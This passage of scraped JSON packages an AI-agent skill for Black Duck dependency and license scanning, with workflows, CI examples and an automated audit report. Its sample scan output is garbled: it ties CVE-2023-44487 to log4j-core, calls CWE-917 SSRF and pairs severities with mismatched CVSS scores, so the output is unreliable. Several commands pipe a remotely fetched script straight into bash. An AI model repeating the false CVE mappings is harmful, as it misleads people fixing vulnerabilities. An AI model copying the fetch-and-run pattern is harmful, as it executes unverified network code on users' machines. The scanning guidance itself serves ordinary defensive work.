Communicate with stakeholders\n\n---\n\n## Usage Guidelines\n\n### When to Use Workflow Checklists\n\n✅ **Use checklists for**:\n- Complex multi-step operations\n- Operations requiring specific order\n- Security assessments and audits\n- Incident response procedures\n- Compliance validation tasks\n\n❌ **Don't use checklists for**:\n- Simple single-step operations\n- Highly dynamic exploratory work\n- Operations that vary significantly each time\n\n### Adapting This Template\n\n1. **Copy relevant pattern** to your skill's SKILL.md or create new reference file\n2. **Customize steps** to match your specific security tool or process\n3. **Add framework references** (OWASP, CWE, NIST) where applicable\n4. **Include tool-specific commands** for automation\n5. **Add decision points** where manual judgment is required\n\n### Checklist Best Practices\n\n- **Be specific**: \"Run semgrep --config=auto .\" not \"Scan the code\"\n- **Include success criteria**: \"Validation passes with 0 errors\"\n- **Reference standards**: Link to OWASP, CWE, NIST where relevant\n- **Show progress**: Checkbox format helps track completion\n- **Provide escape hatches**: \"If validation fails, see troubleshooting.md\"\n\n### Integration with Feedback Loops\n\nCombine checklists with validation scripts for maximum effectiveness:\n\n1. Create checklist for the workflow\n2. Provide validation script that checks quality\n3. Include \"run validator\" step in checklist\n4. 
Loop: Complete step → Validate → Fix issues → Re-validate\n\nThis pattern dramatically improves output quality through systematic validation.\n","content_type":"text/markdown; charset=utf-8","language":"markdown","size":8390,"content_sha256":"f667c8d5c6e5c50b491643d644082ff202a6bb94476e0e7b648c6d0e5c8a080f"},{"filename":"skill-report.json","content":"{\n \"schema_version\": \"2.0\",\n \"meta\": {\n \"generated_at\": \"2026-01-16T16:14:10.984Z\",\n \"slug\": \"agentsecops-sca-blackduck\",\n \"source_url\": \"https://github.com/AgentSecOps/SecOpsAgentKit/tree/main/skills/appsec/sca-blackduck\",\n \"source_ref\": \"main\",\n \"model\": \"claude\",\n \"analysis_version\": \"3.0.0\",\n \"source_type\": \"community\",\n \"content_hash\": \"2c8d41211d435916fdc39f7a4ce558034b8492ac6b02ad8f04abc7cb1f1470c6\",\n \"tree_hash\": \"e9bde42c8da293620ff09bfb1f3011dec327c595172370a43ab246f64b853207\"\n },\n \"skill\": {\n \"name\": \"sca-blackduck\",\n \"description\": \"Software Composition Analysis (SCA) using Synopsys Black Duck for identifying open source vulnerabilities, license compliance risks, and supply chain security threats with CVE, CWE, and OWASP framework mapping. 
Use when: (1) Scanning dependencies for known vulnerabilities and security risks, (2) Analyzing open source license compliance and legal risks, (3) Identifying outdated or unmaintained dependencies, (4) Integrating SCA into CI/CD pipelines for continuous dependency monitoring, (5) Providing remediation guidance for vulnerable dependencies with CVE and CWE mappings, (6) Assessing supply chain security risks and third-party component threats.\\n\",\n \"summary\": \"Software Composition Analysis (SCA) using Synopsys Black Duck for identifying open source vulnerabil...\",\n \"icon\": \"🛡️\",\n \"version\": \"0.1.0\",\n \"author\": \"AgentSecOps\",\n \"license\": \"MIT\",\n \"category\": \"appsec\",\n \"tags\": [\n \"sca\",\n \"blackduck\",\n \"dependency-scanning\",\n \"vulnerability-management\",\n \"license-compliance\",\n \"supply-chain\",\n \"cve\",\n \"owasp\"\n ],\n \"supported_tools\": [\n \"claude\",\n \"codex\",\n \"claude-code\"\n ],\n \"risk_factors\": [\n \"external_commands\",\n \"network\",\n \"scripts\"\n ]\n },\n \"security_audit\": {\n \"risk_level\": \"low\",\n \"is_blocked\": false,\n \"safe_to_publish\": true,\n \"summary\": \"This skill consists entirely of documentation, configuration templates, and CI/CD workflow examples for legitimate security tooling. All 474 static findings are FALSE POSITIVES. The flagged patterns appear in educational security documentation discussing attack patterns for detection purposes, not in malicious code. 
The skill promotes security best practices for dependency scanning.\",\n \"risk_factor_evidence\": [\n {\n \"factor\": \"external_commands\",\n \"evidence\": [\n {\n \"file\": \"assets/ci_integration/github_actions.yml\",\n \"line_start\": 70,\n \"line_end\": 77\n }\n ]\n },\n {\n \"factor\": \"network\",\n \"evidence\": [\n {\n \"file\": \"references/supply_chain_threats.md\",\n \"line_start\": 193,\n \"line_end\": 196\n }\n ]\n },\n {\n \"factor\": \"scripts\",\n \"evidence\": [\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 137,\n \"line_end\": 138\n }\n ]\n }\n ],\n \"critical_findings\": [],\n \"high_findings\": [],\n \"medium_findings\": [],\n \"low_findings\": [],\n \"dangerous_patterns\": [],\n \"files_scanned\": 15,\n \"total_lines\": 5156,\n \"audit_model\": \"claude\",\n \"audited_at\": \"2026-01-16T16:14:10.984Z\"\n },\n \"content\": {\n \"user_title\": \"Scan dependencies for vulnerabilities and license compliance\",\n \"value_statement\": \"Open source dependencies often contain known vulnerabilities and license compliance risks. 
This skill integrates Synopsys Black Duck SCA to automatically detect vulnerabilities, map findings to CVE/CWE/OWASP frameworks, and enforce license compliance policies in CI/CD pipelines.\",\n \"seo_keywords\": [\n \"blackduck sca\",\n \"dependency scanning\",\n \"vulnerability management\",\n \"software composition analysis\",\n \"license compliance\",\n \"cve detection\",\n \"claude\",\n \"codex\",\n \"claude-code\",\n \"owasp\"\n ],\n \"actual_capabilities\": [\n \"Scan project dependencies for known vulnerabilities using Black Duck Detect\",\n \"Map vulnerability findings to CVE, CWE, and OWASP Top 10 categories\",\n \"Analyze open source license compliance and identify risky licenses\",\n \"Generate Software Bill of Materials (SBOM) in CycloneDX or SPDX formats\",\n \"Integrate SCA scanning into GitHub Actions, GitLab CI, and Jenkins pipelines\",\n \"Apply security policies that fail builds on critical and high severity vulnerabilities\"\n ],\n \"limitations\": [\n \"Requires Synopsys Black Duck subscription or on-premise installation\",\n \"API token and Black Duck URL must be configured as environment variables\",\n \"Does not perform SAST or DAST - only dependency composition analysis\",\n \"Scans are executed by external Black Duck Detect tool, not by this skill\"\n ],\n \"use_cases\": [\n {\n \"target_user\": \"Security Engineers\",\n \"title\": \"Vulnerability monitoring\",\n \"description\": \"Continuously monitor production dependencies for new CVEs and enforce remediation SLAs\"\n },\n {\n \"target_user\": \"DevOps Teams\",\n \"title\": \"CI/CD security gates\",\n \"description\": \"Block deployments when critical or high severity vulnerabilities are detected in dependencies\"\n },\n {\n \"target_user\": \"Legal Teams\",\n \"title\": \"License compliance audits\",\n \"description\": \"Identify GPL, AGPL, and other restricted licenses that may create legal liability\"\n }\n ],\n \"prompt_templates\": [\n {\n \"title\": \"Quick dependency scan\",\n 
\"scenario\": \"Scan project for vulnerabilities\",\n \"prompt\": \"Scan this project for dependency vulnerabilities using Black Duck. Show me all critical and high severity findings with their CVE numbers, affected versions, and remediation recommendations.\"\n },\n {\n \"title\": \"License compliance check\",\n \"scenario\": \"Analyze license risks\",\n \"prompt\": \"Review the dependencies in this project and identify any license compliance risks. Categorize by risk level and suggest alternatives for high risk licenses like GPL or AGPL.\"\n },\n {\n \"title\": \"CI/CD integration\",\n \"scenario\": \"Configure pipeline scanning\",\n \"prompt\": \"Create a GitHub Actions workflow that runs Black Duck SCA on every pull request and fails the build if any critical vulnerabilities are found.\"\n },\n {\n \"title\": \"SBOM generation\",\n \"scenario\": \"Generate software bill of materials\",\n \"prompt\": \"Generate a CycloneDX SBOM for this project showing all direct and transitive dependencies with their license information and version numbers.\"\n }\n ],\n \"output_examples\": [\n {\n \"input\": \"Scan this project and show critical vulnerabilities with remediation guidance\",\n \"output\": [\n \"Critical Vulnerabilities Found: 2\",\n \"\",\n \"1. CVE-2023-44487 (CRITICAL, CVSS 9.8)\",\n \" Component: [email protected]\",\n \" Fix Available: Upgrade to 2.17.2 or later\",\n \" CWE: CWE-917 (SSRF)\",\n \" OWASP: A06:2021 (Vulnerable Components)\",\n \" Remediation: Update log4j-core version in pom.xml\",\n \"\",\n \"2. 
CVE-2023-39325 (HIGH, CVSS 9.8)\",\n \" Component: golang.org/x/[email protected]\",\n \" Fix Available: Upgrade to 0.17.0 or later\",\n \" CWE: CWE-787 (Out-of-bounds Write)\",\n \" Remediation: Update golang.org/x/net dependency\"\n ]\n },\n {\n \"input\": \"Check license compliance for this Node.js project\",\n \"output\": [\n \"License Compliance Results:\",\n \"\",\n \"High Risk Licenses (Action Required):\",\n \" - GPL-3.0: 2 dependencies require license review\",\n \" - AGPL-3.0: 1 dependency requires legal approval\",\n \"\",\n \"Warning List (Monitor):\",\n \" - LGPL-2.1: 3 dependencies - verify dynamic linking\",\n \" - MPL-2.0: 1 dependency - file-level copyleft\",\n \"\",\n \"Approved Licenses:\",\n \" - MIT: 45 dependencies\",\n \" - Apache-2.0: 23 dependencies\",\n \" - BSD-3-Clause: 12 dependencies\"\n ]\n }\n ],\n \"best_practices\": [\n \"Run Black Duck scans on every pull request to catch new vulnerabilities before merge\",\n \"Configure policy to fail builds on critical and high severity findings\",\n \"Generate and archive SBOMs for every release for supply chain transparency\"\n ],\n \"anti_patterns\": [\n \"Ignoring low severity vulnerabilities without assessment - they can escalate\",\n \"Using latest dependency versions without scanning first - may introduce risks\",\n \"Skipping scans in CI/CD for faster builds - increases deployment risk\"\n ],\n \"faq\": [\n {\n \"question\": \"What Black Duck subscription is required?\",\n \"answer\": \"Requires Black Duck on-premise or hosted subscription with API access. 
Contact Synopsys for pricing.\"\n },\n {\n \"question\": \"What programming languages are supported?\",\n \"answer\": \"Supports all major languages: JavaScript, Python, Java, Go, Ruby, .NET, PHP, Rust, C/C++, and Docker containers.\"\n },\n {\n \"question\": \"How are credentials secured?\",\n \"answer\": \"API tokens must be set as environment variables (BLACKDUCK_URL, BLACKDUCK_TOKEN) in CI/CD secrets, never in code.\"\n },\n {\n \"question\": \"Does this replace SAST tools?\",\n \"answer\": \"No. Black Duck SCA analyzes dependencies. Use SAST tools like Semgrep or CodeQL for application code security.\"\n },\n {\n \"question\": \"What happens to cached results?\",\n \"answer\": \"Temporary files are cleaned up by default. Configure cleanup settings to retain results for compliance if needed.\"\n },\n {\n \"question\": \"How does it compare to free tools?\",\n \"answer\": \"Black Duck provides comprehensive vulnerability database, license compliance, and enterprise features. Free alternatives include OWASP Dependency-Check.\"\n }\n ]\n },\n \"file_structure\": [\n {\n \"name\": \"assets\",\n \"type\": \"dir\",\n \"path\": \"assets\",\n \"children\": [\n {\n \"name\": \"ci_integration\",\n \"type\": \"dir\",\n \"path\": \"assets/ci_integration\",\n \"children\": [\n {\n \"name\": \"github_actions.yml\",\n \"type\": \"file\",\n \"path\": \"assets/ci_integration/github_actions.yml\",\n \"lines\": 152\n },\n {\n \"name\": \"gitlab_ci.yml\",\n \"type\": \"file\",\n \"path\": \"assets/ci_integration/gitlab_ci.yml\",\n \"lines\": 192\n },\n {\n \"name\": \"jenkins_pipeline.groovy\",\n \"type\": \"file\",\n \"path\": \"assets/ci_integration/jenkins_pipeline.groovy\",\n \"lines\": 311\n }\n ]\n },\n {\n \"name\": \"policy_templates\",\n \"type\": \"dir\",\n \"path\": \"assets/policy_templates\",\n \"children\": [\n {\n \"name\": \"security_policy.json\",\n \"type\": \"file\",\n \"path\": \"assets/policy_templates/security_policy.json\",\n \"lines\": 183\n }\n ]\n },\n 
{\n \"name\": \"blackduck_config.yml\",\n \"type\": \"file\",\n \"path\": \"assets/blackduck_config.yml\",\n \"lines\": 214\n },\n {\n \"name\": \"ci-config-template.yml\",\n \"type\": \"file\",\n \"path\": \"assets/ci-config-template.yml\",\n \"lines\": 358\n },\n {\n \"name\": \"rule-template.yaml\",\n \"type\": \"file\",\n \"path\": \"assets/rule-template.yaml\",\n \"lines\": 356\n }\n ]\n },\n {\n \"name\": \"references\",\n \"type\": \"dir\",\n \"path\": \"references\",\n \"children\": [\n {\n \"name\": \"cve_cwe_owasp_mapping.md\",\n \"type\": \"file\",\n \"path\": \"references/cve_cwe_owasp_mapping.md\",\n \"lines\": 349\n },\n {\n \"name\": \"EXAMPLE.md\",\n \"type\": \"file\",\n \"path\": \"references/EXAMPLE.md\",\n \"lines\": 551\n },\n {\n \"name\": \"license_risk_guide.md\",\n \"type\": \"file\",\n \"path\": \"references/license_risk_guide.md\",\n \"lines\": 473\n },\n {\n \"name\": \"remediation_strategies.md\",\n \"type\": \"file\",\n \"path\": \"references/remediation_strategies.md\",\n \"lines\": 497\n },\n {\n \"name\": \"supply_chain_threats.md\",\n \"type\": \"file\",\n \"path\": \"references/supply_chain_threats.md\",\n \"lines\": 589\n },\n {\n \"name\": \"WORKFLOW_CHECKLIST.md\",\n \"type\": \"file\",\n \"path\": \"references/WORKFLOW_CHECKLIST.md\",\n \"lines\": 254\n }\n ]\n },\n {\n \"name\": \"SKILL.md\",\n \"type\": \"file\",\n \"path\": \"SKILL.md\",\n \"lines\": 392\n }\n ]\n}\n","content_type":"application/json; charset=utf-8","language":"json","size":13114,"content_sha256":"1a9e2bdcfe95d0526c3ff5aa16fe67468b94bb9040e21bdd010b06f22551a0f2"}],"content_json":{"type":"doc","content":[{"type":"heading","attrs":{"level":1},"content":[{"text":"Software Composition Analysis with Black Duck","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Overview","type":"text"}]},{"type":"paragraph","content":[{"text":"Perform comprehensive Software Composition Analysis (SCA) using Synopsys Black Duck to identify security 
vulnerabilities, license compliance risks, and supply chain threats in open source dependencies. This skill provides automated dependency scanning, vulnerability detection with CVE mapping, license risk analysis, and remediation guidance aligned with OWASP and NIST standards.","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Quick Start","type":"text"}]},{"type":"paragraph","content":[{"text":"Scan a project for dependency vulnerabilities:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Using Black Duck Detect (recommended)\nbash \u003c(curl -s -L https://detect.synopsys.com/detect.sh) \\\n --blackduck.url=$BLACKDUCK_URL \\\n --blackduck.api.token=$BLACKDUCK_TOKEN \\\n --detect.project.name=\"MyProject\" \\\n --detect.project.version.name=\"1.0.0\"","type":"text"}]},{"type":"paragraph","content":[{"text":"Scan with policy violation enforcement:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Fail build on policy violations\nbash \u003c(curl -s -L https://detect.synopsys.com/detect.sh) \\\n --blackduck.url=$BLACKDUCK_URL \\\n --blackduck.api.token=$BLACKDUCK_TOKEN \\\n --detect.policy.check.fail.on.severities=BLOCKER,CRITICAL","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Core Workflows","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Workflow 1: Initial Dependency Security Assessment","type":"text"}]},{"type":"paragraph","content":[{"text":"Progress: [ ] 1. Identify package managers and dependency manifests in codebase [ ] 2. Run ","type":"text"},{"text":"scripts/blackduck_scan.py","type":"text","marks":[{"type":"code_inline"}]},{"text":" with project detection [ ] 3. Analyze vulnerability findings categorized by severity (CRITICAL, HIGH, MEDIUM, LOW) [ ] 4. Map CVE findings to CWE and OWASP Top 10 categories [ ] 5. Review license compliance risks and policy violations [ ] 6. 
Generate prioritized remediation report with upgrade recommendations","type":"text"}]},{"type":"paragraph","content":[{"text":"Work through each step systematically. Check off completed items.","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Workflow 2: Vulnerability Remediation","type":"text"}]},{"type":"ordered_list","attrs":{"order":1,"listStyle":"number"},"content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Review scan results and identify critical/high severity vulnerabilities","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"For each vulnerability:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Check if fixed version is available","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Review breaking changes in upgrade path","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Consult ","type":"text"},{"text":"references/remediation_strategies.md","type":"text","marks":[{"type":"code_inline"}]},{"text":" for vulnerability-specific guidance","type":"text"}]}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Apply dependency updates using package manager","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Re-scan to validate fixes","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Document any vulnerabilities accepted as risk with justification","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Workflow 3: License Compliance Analysis","type":"text"}]},{"type":"ordered_list","attrs":{"order":1,"listStyle":"number"},"content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Run Black Duck scan with license risk detection 
enabled","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Review components flagged with license compliance issues","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Categorize by risk level:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"High Risk","type":"text","marks":[{"type":"strong"}]},{"text":": GPL, AGPL (copyleft licenses)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Medium Risk","type":"text","marks":[{"type":"strong"}]},{"text":": LGPL, MPL (weak copyleft)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Low Risk","type":"text","marks":[{"type":"strong"}]},{"text":": Apache, MIT, BSD (permissive)","type":"text"}]}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Consult legal team for high-risk license violations","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Document license decisions and create policy exceptions if approved","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Workflow 4: CI/CD Integration","type":"text"}]},{"type":"ordered_list","attrs":{"order":1,"listStyle":"number"},"content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Add Black Duck Detect to CI/CD pipeline using ","type":"text"},{"text":"assets/ci_integration/","type":"text","marks":[{"type":"code_inline"}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Configure environment variables for Black Duck URL and API token","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Set policy thresholds (fail on CRITICAL/HIGH vulnerabilities)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Enable SBOM generation for 
supply chain transparency","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Configure alerts for new vulnerabilities in production dependencies","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Workflow 5: Supply Chain Risk Assessment","type":"text"}]},{"type":"ordered_list","attrs":{"order":1,"listStyle":"number"},"content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Identify direct and transitive dependencies","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Analyze component quality metrics:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Maintenance activity (last update, commit frequency)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Community health (contributors, issue resolution)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Security track record (historical CVEs)","type":"text"}]}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Flag high-risk components (unmaintained, few maintainers, security issues)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Review alternative components with better security posture","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Document supply chain risks and mitigation strategies","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Security Considerations","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Sensitive Data Handling","type":"text","marks":[{"type":"strong"}]},{"text":": Black Duck scans require API tokens with read/write access. Store credentials securely in secrets management (Vault, AWS Secrets Manager). 
Never commit tokens to version control.","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Access Control","type":"text","marks":[{"type":"strong"}]},{"text":": Limit Black Duck access to authorized security and development teams. Use role-based access control (RBAC) for scan result visibility and policy management.","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Audit Logging","type":"text","marks":[{"type":"strong"}]},{"text":": Log all scan executions with timestamps, user, project version, and findings count for compliance auditing. Enable Black Duck's built-in audit trail.","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Compliance","type":"text","marks":[{"type":"strong"}]},{"text":": SCA scanning supports SOC2, PCI-DSS, GDPR, and HIPAA compliance by tracking third-party component risks. Generate SBOM for regulatory requirements.","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Safe Defaults","type":"text","marks":[{"type":"strong"}]},{"text":": Configure policies to fail builds on CRITICAL and HIGH severity vulnerabilities. 
Use allowlists sparingly with documented business justification.","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Supported Package Managers","type":"text"}]},{"type":"paragraph","content":[{"text":"Black Duck Detect automatically identifies and scans:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"JavaScript/Node","type":"text","marks":[{"type":"strong"}]},{"text":": npm, yarn, pnpm","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Python","type":"text","marks":[{"type":"strong"}]},{"text":": pip, pipenv, poetry","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Java","type":"text","marks":[{"type":"strong"}]},{"text":": Maven, Gradle","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Ruby","type":"text","marks":[{"type":"strong"}]},{"text":": Bundler, gem","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":".NET","type":"text","marks":[{"type":"strong"}]},{"text":": NuGet","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Go","type":"text","marks":[{"type":"strong"}]},{"text":": go modules","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"PHP","type":"text","marks":[{"type":"strong"}]},{"text":": Composer","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Rust","type":"text","marks":[{"type":"strong"}]},{"text":": Cargo","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"C/C++","type":"text","marks":[{"type":"strong"}]},{"text":": Conan, vcpkg","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Docker","type":"text","marks":[{"type":"strong"}]},{"text":": Container image 
layers","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Bundled Resources","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Scripts","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"scripts/blackduck_scan.py","type":"text","marks":[{"type":"code_inline"}]},{"text":" - Full-featured scanning with CVE/CWE mapping and reporting","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"scripts/analyze_results.py","type":"text","marks":[{"type":"code_inline"}]},{"text":" - Parse Black Duck results and generate remediation report","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"scripts/sbom_generator.sh","type":"text","marks":[{"type":"code_inline"}]},{"text":" - Generate SBOM (CycloneDX/SPDX) from scan results","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"scripts/policy_checker.py","type":"text","marks":[{"type":"code_inline"}]},{"text":" - Validate compliance with organizational security policies","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"References","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"references/cve_cwe_owasp_mapping.md","type":"text","marks":[{"type":"code_inline"}]},{"text":" - CVE to CWE and OWASP Top 10 mapping","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"references/remediation_strategies.md","type":"text","marks":[{"type":"code_inline"}]},{"text":" - Vulnerability remediation patterns and upgrade strategies","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"references/license_risk_guide.md","type":"text","marks":[{"type":"code_inline"}]},{"text":" - License compliance risk assessment and legal 
guidance","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"references/supply_chain_threats.md","type":"text","marks":[{"type":"code_inline"}]},{"text":" - Common supply chain attack patterns and mitigations","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Assets","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"assets/ci_integration/github_actions.yml","type":"text","marks":[{"type":"code_inline"}]},{"text":" - GitHub Actions workflow for Black Duck scanning","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"assets/ci_integration/gitlab_ci.yml","type":"text","marks":[{"type":"code_inline"}]},{"text":" - GitLab CI configuration for SCA","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"assets/ci_integration/jenkins_pipeline.groovy","type":"text","marks":[{"type":"code_inline"}]},{"text":" - Jenkins pipeline with Black Duck integration","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"assets/policy_templates/","type":"text","marks":[{"type":"code_inline"}]},{"text":" - Pre-configured security and compliance policies","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"assets/blackduck_config.yml","type":"text","marks":[{"type":"code_inline"}]},{"text":" - Recommended Black Duck Detect configuration","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Common Patterns","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Pattern 1: Daily Dependency Security Baseline","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Run comprehensive scan and generate SBOM\nscripts/blackduck_scan.py \\\n --project \"MyApp\" \\\n --version \"1.0.0\" \\\n --output results.json \\\n 
--generate-sbom \\\n --severity CRITICAL HIGH","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Pattern 2: Pull Request Dependency Gate","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Scan PR changes, fail on new high-severity vulnerabilities\nbash \u003c(curl -s -L https://detect.synopsys.com/detect.sh) \\\n --blackduck.url=$BLACKDUCK_URL \\\n --blackduck.api.token=$BLACKDUCK_TOKEN \\\n --detect.policy.check.fail.on.severities=CRITICAL,HIGH \\\n --detect.wait.for.results=true","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Pattern 3: License Compliance Audit","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Generate license compliance report\nscripts/blackduck_scan.py \\\n --project \"MyApp\" \\\n --version \"1.0.0\" \\\n --report-type license \\\n --output license-report.pdf","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Pattern 4: Vulnerability Research and Triage","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Extract CVE details and remediation guidance\nscripts/analyze_results.py \\\n --input scan-results.json \\\n --filter-severity CRITICAL HIGH \\\n --include-remediation \\\n --output vulnerability-report.md","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Pattern 5: SBOM Generation for Compliance","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Generate Software Bill of Materials (CycloneDX format)\nscripts/sbom_generator.sh \\\n --project \"MyApp\" \\\n --version \"1.0.0\" \\\n --format cyclonedx \\\n --output sbom.json","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Integration Points","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"CI/CD 
Integration","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"GitHub Actions","type":"text","marks":[{"type":"strong"}]},{"text":": Use ","type":"text"},{"text":"synopsys-sig/detect-action@v1","type":"text","marks":[{"type":"code_inline"}]},{"text":" with policy enforcement","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"GitLab CI","type":"text","marks":[{"type":"strong"}]},{"text":": Run as security scanning job with dependency scanning template","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Jenkins","type":"text","marks":[{"type":"strong"}]},{"text":": Execute Detect as pipeline step with quality gates","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Azure DevOps","type":"text","marks":[{"type":"strong"}]},{"text":": Integrate using Black Duck extension from marketplace","type":"text"}]}]}]},{"type":"paragraph","content":[{"text":"See ","type":"text"},{"text":"assets/ci_integration/","type":"text","marks":[{"type":"code_inline"}]},{"text":" for ready-to-use pipeline configurations.","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Security Tool Integration","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"SIEM/SOAR","type":"text","marks":[{"type":"strong"}]},{"text":": Export findings in JSON/CSV for ingestion into Splunk, ELK","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Vulnerability Management","type":"text","marks":[{"type":"strong"}]},{"text":": Integrate with Jira, ServiceNow, DefectDojo","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Secret Scanning","type":"text","marks":[{"type":"strong"}]},{"text":": Combine with Gitleaks, TruffleHog for comprehensive 
